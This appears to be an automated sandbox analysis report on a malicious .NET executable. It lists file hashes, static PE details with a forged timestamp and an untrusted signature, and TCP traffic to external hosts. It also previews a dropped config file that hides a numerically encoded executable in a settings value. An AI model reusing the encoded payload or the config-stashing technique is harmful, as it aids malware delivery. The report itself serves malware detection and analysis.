                                                                                                                                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                                            C:\Users\user\AppData\Local\gLCtQBLkJiklhuQmKxvHxPdgE\e0YQRfcpqS.exe_Url_0tjnbr1lnyahqnr3ds44zzobpcvvbkgw\7.572.261.222\bnjt21d2.newcfg
                                                                                                                                                                                            Process:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):497854
                                                                                                                                                                                            Entropy (8bit):3.123976368826284
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:AdRa7VWopyzhfD3O06pkexoLX+b4ZoPIS+UIMKc:AdWcopyzhfD3OnpkgoXBHxc
                                                                                                                                                                                            MD5:2D03412E58A34A8A077BB11708B7EBBF
                                                                                                                                                                                            SHA1:25ED45E5B7C92CD2AC5EFAA73D18234EEDD6CD45
                                                                                                                                                                                            SHA-256:3E8E087F8BFA35782778892E5E1208E9B28517CA3DE3F4A268E6AB6DEABB7D4D
                                                                                                                                                                                            SHA-512:828B4E57C59BA96183387FE8165E39E8241CCA68B309B8CB276EE90653F72EC6B6C5B2A1BECE71B25FD58CE0E118A15E3ECAF2D81AE4592FC3675A262558BEDE
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="gLCtQBLkJiklhuQmKxvHxPdgEFgVycNxLDshWIxwlH.NEpIPiYBWKYUvhUfgv" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <gLCtQBLkJiklhuQmKxvHxPdgEFgVycNxLDshWIxwlH.NEpIPiYBWKYUvhUfgv>.. <setting name="FgmnRDuHYDQPWTkEmcdAueaHPIluEp" serializeAs="String">.. <value>77P90P144P0P3P0P0P0P4P0P0P0P255P255P0P0P184P0P0P0P0P0P0P0P64P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P128P0P0P0P14P31P186P14P0P180P9P205P33P184P1P76P205P33P84P104P105P115P32P112P114P111P103P114P9

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Entropy (8bit):6.073009850057018
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                            File name:e0YQRfcpqS.exe
                                                                                                                                                                                            File size:17744
                                                                                                                                                                                            MD5:936100c988a1cada3c86b057c019d1f0
                                                                                                                                                                                            SHA1:a93fc4ca21d28e38c9e225da081a7a7879457d8e
                                                                                                                                                                                            SHA256:2fff4895961b88cecf01af71e7d7ad3b3c2359332a5501444310350aefd81748
                                                                                                                                                                                            SHA512:a29cee095e6a518a09665405707de225d05b75191d8275b3444ed58c0b8027c671fd69bcbca1882236045e68f35a0a8f62d88f07b6d9d78f177cb501bd748d72
                                                                                                                                                                                            SSDEEP:384:++uVeFHzY8xULh+cSz1mQa+0SCAlqyzNBxN6ndEWb6ghi:+eFHZ+LEz0K086ndEW2ghi
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yX............"...0..(...........G... ...`....@.. ..............................).....@................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x4047ee
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                            Time Stamp:0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:C=jcOjXMwIFjiNFpBIcumNahFaQfcEzHApExwtwrtCeIB, S=zdnOKprLBoqofKAUQEsDOrqHziGpqoAqhAKJONaTVobL, L=UpiPdBMjRBrqzjMbCKimZCZAqUxSCajY, T=TpnDfwhzYrTVQiVAPJOVqBYNutvEOQeUsQIEFUmWtpAPO, E=BRgJBTystAOzgIQgqKEqwXNS, OU=fbfwkzMpsh, O=woDmXCXGFYuSGbzYEyfjYUuJNFjwRfSLczKOunbhw, CN=DKBzARLWliRJthgcXzZKtMGeQdgNOrLZXqH
                                                                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                            Error Number:-2146762487
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                            • 3/1/2021 9:44:04 PM 3/1/2022 9:44:04 PM
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • C=jcOjXMwIFjiNFpBIcumNahFaQfcEzHApExwtwrtCeIB, S=zdnOKprLBoqofKAUQEsDOrqHziGpqoAqhAKJONaTVobL, L=UpiPdBMjRBrqzjMbCKimZCZAqUxSCajY, T=TpnDfwhzYrTVQiVAPJOVqBYNutvEOQeUsQIEFUmWtpAPO, E=BRgJBTystAOzgIQgqKEqwXNS, OU=fbfwkzMpsh, O=woDmXCXGFYuSGbzYEyfjYUuJNFjwRfSLczKOunbhw, CN=DKBzARLWliRJthgcXzZKtMGeQdgNOrLZXqH
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:5391C8DEF46C8F63625F08E1DB70F3E1
                                                                                                                                                                                            Thumbprint SHA-1:015665A3DCD49018B2EE3E4FAB84F62721C8B4AC
                                                                                                                                                                                            Thumbprint SHA-256:48EFEF71929E30BE9D41E8F8FC5092D1A6D753E9F97016CB7906E7561CB4FF94
                                                                                                                                                                                            Serial:6A71FDCE2644C952C07FAEC52BA819C6

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x47940x57.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x3fc.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x30000x1550.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x20000x27f40x2800False0.5298828125data5.53835973322IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rsrc0x60000x3fc0x400False0.4541015625data3.35569657372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                            RT_VERSION0x60580x3a4dataEnglishUnited States

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                                                            Version Infos

                                                                                                                                                                                            DescriptionData
                                                                                                                                                                                            LegalCopyright2015 computeCurrentBogusState
                                                                                                                                                                                            Assembly Version8.2.0.5
                                                                                                                                                                                            InternalNameSmtpSection.exe
                                                                                                                                                                                            FileVersion0.2.0.5
                                                                                                                                                                                            CompanyNameget_DataGridSelection
                                                                                                                                                                                            LegalTrademarksSHA256Cng
                                                                                                                                                                                            CommentsWriteAsync
                                                                                                                                                                                            ProductNameSmtpSection
                                                                                                                                                                                            ProductVersion8.2.0.5
                                                                                                                                                                                            FileDescriptionget_AutoScrollMargin
                                                                                                                                                                                            OriginalFilenameSmtpSection.exe
                                                                                                                                                                                            Translation0x0409 0x0514

                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Mar 2, 2021 20:35:49.421025038 CET4971480192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.461586952 CET8049714151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.461688042 CET4971480192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.462201118 CET4971480192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.502630949 CET8049714151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.503057957 CET8049714151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.503124952 CET8049714151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.503309011 CET4971480192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.504456997 CET4971480192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.547190905 CET8049714151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.642925024 CET49715443192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.683458090 CET44349715151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.683621883 CET49715443192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.693310022 CET49715443192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.733884096 CET44349715151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.733916044 CET44349715151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.733931065 CET44349715151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.733988047 CET49715443192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.752223969 CET49715443192.168.2.5151.101.2.133
                                                                                                                                                                                            Mar 2, 2021 20:35:49.792881012 CET44349715151.101.2.133192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.556854963 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.605319023 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.605449915 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.605760098 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.654212952 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818006992 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818049908 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818070889 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818089962 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818113089 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818135977 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818157911 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818181038 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818203926 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818219900 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818227053 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818262100 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818278074 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.819128036 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.819164991 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.819257975 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.820255041 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.820292950 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.820373058 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.821382999 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.821440935 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.821563005 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.822515965 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.822551966 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.822614908 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.823659897 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.823694944 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.823760033 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.824790001 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.824827909 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.824912071 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.825890064 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.825928926 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.826020002 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.827034950 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.827066898 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.827466011 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.828171015 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.828205109 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.828296900 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.829335928 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.829374075 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.829478979 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.866653919 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.866828918 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.866862059 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.866913080 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.868007898 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.868052006 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.868479967 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.869143009 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.869174957 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.869227886 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.870275974 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.870311975 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.870373011 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.871500969 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.871537924 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.871742010 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.872533083 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.872565985 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.872625113 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.873646975 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.873680115 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.873723030 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.874742031 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.874819994 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.882152081 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.882190943 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.882266998 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.882626057 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.882656097 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.882716894 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.883785963 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.883820057 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.883879900 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.884907961 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.884943962 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.884994030 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.886054039 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.886091948 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.886158943 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.887186050 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.887226105 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.887293100 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.888310909 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.888345957 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.888430119 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.889456034 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.889491081 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.889569044 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.890569925 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.890605927 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.890665054 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.891725063 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.891763926 CET8049720172.67.179.188192.168.2.5
